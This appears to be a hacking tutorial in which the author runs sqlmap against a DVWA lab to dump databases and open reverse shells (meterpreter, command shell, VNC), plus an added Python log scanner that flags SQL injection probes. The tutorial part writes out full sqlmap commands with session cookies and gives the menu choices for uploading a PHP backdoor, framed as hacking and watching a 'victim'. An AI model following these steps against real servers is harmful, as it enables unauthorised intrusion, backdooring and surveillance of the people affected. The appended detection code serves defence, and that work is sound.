This article is about how to use sqlmap for SQL injection to hack a victim PC and gain shell access. Here I have performed an SQL attack to gain three different types of shell (meterpreter, command shell, VNC).
Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, sqlmap tool
Now open the DVWA on your PC and log in with the following credentials:
Username – admin
Password – password
Click on DVWA Security and set the Website Security Level to low.
From the list of vulnerabilities select SQL Injection for your attack. Type user ID: 1 in the text box. Don’t click on the submit button without setting the browser proxy. Set your browser proxy to make Burp Suite work properly.
Turn on Burp Suite, click on Proxy in the menu bar and go for the "intercept is on" button. Come back and click on the submit button in DVWA. Burp Suite will provide the "cookie" and "referrer" under the fetched data, which will be used later in the sqlmap commands.
Let's enumerate all database names using the "referrer and cookies" under the sqlmap command.
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" --dbs
It has dumped all the database names. Now I am going to choose dvwa to access its back-end database management system.
Now type the following command to access a shell on the web server and follow the screenshot.
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn
Type 1 for the Metasploit framework to establish a reverse connection, then type 4 for the PHP payload supported by the server, and again type 1 for the common location of a writable directory to upload the payload as a backdoor on the victim PC.
Here type 1 for a reverse TCP connection as the default option. Now I will choose all three payloads one by one and try to hack the web server every time. Now type 1 for meterpreter.
It will load the Metasploit framework and provide meterpreter session 1.
Repeat the whole process up to the reverse TCP connection; when it then asks you to choose a payload, type 2 for shell.
Again it will load the Metasploit framework and provide command shell session 1.
Repeat the whole process up to the reverse TCP connection; when it then asks you to choose a payload, this time type 3 for VNC.
Again it will load the Metasploit framework and launch the VNC viewer.
Here you can see from the given screenshot that I had accessed the victim PC through TightVNC, and now the victim's every moment will be kept under my observation. Hence we have hacked the victim PC three times with various types of shell.
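The requests sqlmap sends during the steps above are visible in the web server's access log. The following is an added example, not part of the original article: a small scanner for Apache combined-format logs that flags requests to the DVWA SQL injection page with a non-numeric id, UNION SELECT probing, file-write clauses, or sqlmap's default User-Agent. The log lines, IP addresses, file path and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not from the article).
SAMPLE_LOG = '''\
192.168.1.50 - - [10/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4500 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.60 - - [10/Jan/2024:10:02:10 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-&Submit=Submit HTTP/1.1" 200 4600 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.168.1.60 - - [10/Jan/2024:10:03:30 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27%2Ftmp%2Fx.php%27--%20-&Submit=Submit HTTP/1.1" 200 4400 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

# client IP, method, request target, User-Agent
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Hypothetical rule names; patterns are applied to the URL-decoded id value.
RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("file-write", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
]

def inspect_line(line):
    """Return (client_ip, [rule names]) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _method, target, ua = m.groups()
    parts = urlsplit(target)
    if not parts.path.rstrip("/").endswith("/vulnerabilities/sqli"):
        return None
    hits = []
    if "sqlmap" in ua.lower():  # default UA only; trivially changed by the client
        hits.append("sqlmap-user-agent")
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if not value.isdigit():  # the page expects a numeric user ID
            hits.append("non-numeric-id")
        hits += [name for name, rx in RULES if rx.search(value)]
    return (ip, hits) if hits else None

def scan(log_text):
    """Inspect every line and keep only the flagged requests."""
    return [r for r in map(inspect_line, log_text.splitlines()) if r]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, ",".join(hits))
```

The User-Agent rule only catches an unmodified client, so the non-numeric-id and file-write rules carry the detection; a POST-based form would need request-body logging to get the same coverage.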